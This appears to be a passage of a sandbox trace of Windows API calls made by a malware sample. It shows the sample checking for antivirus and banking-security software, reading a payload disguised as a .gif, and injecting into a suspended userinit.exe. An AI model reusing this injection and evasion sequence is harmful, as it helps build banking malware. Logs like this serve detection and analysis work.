[0096.986] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x7ffd8008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0096.987] SetThreadContext (hThread=0xf0, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xefb90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0096.987] ResumeThread (hThread=0xf0) returned 0x1
[0097.011] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0097.012] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0097.012] GlobalUnlock (hMem=0x189000c) returned 0
[0097.012] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0097.012] GlobalUnlock (hMem=0x1890004) returned 0
[0097.018] Sleep (dwMilliseconds=0xe74e)
[0107.033] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0107.034] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0107.034] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0107.034] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0107.034] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8
[0107.034] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0107.034] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0107.034] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0107.034] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0107.036] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0107.036] ReadFile (in: hFile=0xf8, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0107.040] CloseHandle (hObject=0xf8) returned 1
[0107.041] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.041] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.041] GlobalUnlock (hMem=0x189000c) returned 0
[0107.041] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0107.041] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.042] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.042] GlobalUnlock (hMem=0x189000c) returned 0
[0107.042] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0107.043] GlobalLock (hMem=0x189000c) returned 0x25f110
[0107.044] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0107.044] GlobalUnlock (hMem=0x189000c) returned 0
[0107.044] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0107.044] GlobalLock (hMem=0x189000c) returned 0x265120
[0107.045] GlobalHandle (pMem=0x265120) returned 0x189000c
[0107.045] GlobalUnlock (hMem=0x189000c) returned 0
[0107.045] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0107.045] GlobalLock (hMem=0x189000c) returned 0x265120
[0107.046] GlobalHandle (pMem=0x265120) returned 0x189000c
[0107.046] GlobalUnlock (hMem=0x189000c) returned 0
[0107.046] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0107.046] GlobalLock (hMem=0x189000c) returned 0x26f130
[0107.047] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0107.047] GlobalUnlock (hMem=0x189000c) returned 0
[0107.047] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0107.047] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.048] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.048] GlobalUnlock (hMem=0x189000c) returned 0
[0107.048] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0107.048] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.049] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.049] GlobalUnlock (hMem=0x189000c) returned 0
[0107.049] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0107.049] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.050] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.050] GlobalUnlock (hMem=0x189000c) returned 0
[0107.050] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0107.050] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.051] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.051] GlobalUnlock (hMem=0x189000c) returned 0
[0107.051] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0107.051] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.051] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.051] GlobalUnlock (hMem=0x189000c) returned 0
[0107.051] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0107.051] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.052] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.052] GlobalUnlock (hMem=0x189000c) returned 0
[0107.052] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0107.052] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.053] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.053] GlobalUnlock (hMem=0x189000c) returned 0
[0107.053] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0107.053] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.054] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.054] GlobalUnlock (hMem=0x189000c) returned 0
[0107.054] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0107.054] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.054] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.054] GlobalUnlock (hMem=0x189000c) returned 0
[0107.054] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0107.054] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.055] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.055] GlobalUnlock (hMem=0x189000c) returned 0
[0107.055] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0107.058] GlobalLock (hMem=0x189000c) returned 0x27b110
[0107.059] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0107.059] GlobalUnlock (hMem=0x189000c) returned 0
[0107.059] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0107.059] GlobalLock (hMem=0x189000c) returned 0x27b110
[0107.059] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0107.059] GlobalUnlock (hMem=0x189000c) returned 0
[0107.059] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0107.061] GlobalLock (hMem=0x189000c) returned 0x29f120
[0107.062] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0107.062] GlobalUnlock (hMem=0x189000c) returned 0
[0107.062] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0107.062] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.063] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.063] GlobalUnlock (hMem=0x189000c) returned 0
[0107.063] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0107.063] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.064] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.064] GlobalUnlock (hMem=0x189000c) returned 0
[0107.064] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0107.064] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.064] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.064] GlobalUnlock (hMem=0x189000c) returned 0
[0107.064] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0107.064] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.065] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.065] GlobalUnlock (hMem=0x189000c) returned 0
[0107.065] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0107.065] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.066] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.066] GlobalUnlock (hMem=0x189000c) returned 0
[0107.066] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0107.066] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.067] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.067] GlobalUnlock (hMem=0x189000c) returned 0
[0107.067] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0107.067] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.067] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.067] GlobalUnlock (hMem=0x189000c) returned 0
[0107.067] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0107.067] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.068] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.068] GlobalUnlock (hMem=0x189000c) returned 0
[0107.068] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0107.068] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.069] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.069] GlobalUnlock (hMem=0x189000c) returned 0
[0107.069] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0107.069] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.070] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.070] GlobalUnlock (hMem=0x189000c) returned 0
[0107.070] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0107.070] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.070] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.070] GlobalUnlock (hMem=0x189000c) returned 0
[0107.070] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0107.070] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.071] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.071] GlobalUnlock (hMem=0x189000c) returned 0
[0107.071] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0107.071] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.079] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.079] GlobalUnlock (hMem=0x189000c) returned 0
[0107.079] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0107.079] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.080] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.080] GlobalUnlock (hMem=0x189000c) returned 0
[0107.080] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0107.080] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.080] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.080] GlobalUnlock (hMem=0x189000c) returned 0
[0107.080] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0107.080] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.081] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.081] GlobalUnlock (hMem=0x189000c) returned 0
[0107.081] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0107.081] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.082] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.082] GlobalUnlock (hMem=0x189000c) returned 0
[0107.082] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0107.082] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.083] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.083] GlobalUnlock (hMem=0x189000c) returned 0
[0107.083] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0107.083] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.083] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.083] GlobalUnlock (hMem=0x189000c) returned 0
[0107.083] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0107.083] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.084] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.084] GlobalUnlock (hMem=0x189000c) returned 0
[0107.084] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0107.084] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.085] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.085] GlobalUnlock (hMem=0x189000c) returned 0
[0107.085] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0107.085] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.085] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.086] GlobalUnlock (hMem=0x189000c) returned 0
[0107.086] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0107.086] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.086] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.086] GlobalUnlock (hMem=0x189000c) returned 0
[0107.086] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0107.086] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.087] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.087] GlobalUnlock (hMem=0x189000c) returned 0
[0107.087] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0107.087] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.088] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.088] GlobalUnlock (hMem=0x189000c) returned 0
[0107.088] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0107.088] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.088] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.088] GlobalUnlock (hMem=0x189000c) returned 0
[0107.089] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0107.089] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.089] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.089] GlobalUnlock (hMem=0x189000c) returned 0
[0107.089] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0107.089] GlobalLock (hMem=0x189000c) returned 0x25b100
[0107.090] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0xf4, hThread=0xf8, dwProcessId=0xfa4, dwThreadId=0xfa8)) returned 1
[0107.093] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0107.093] GetThreadContext (in: hThread=0xf8, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, 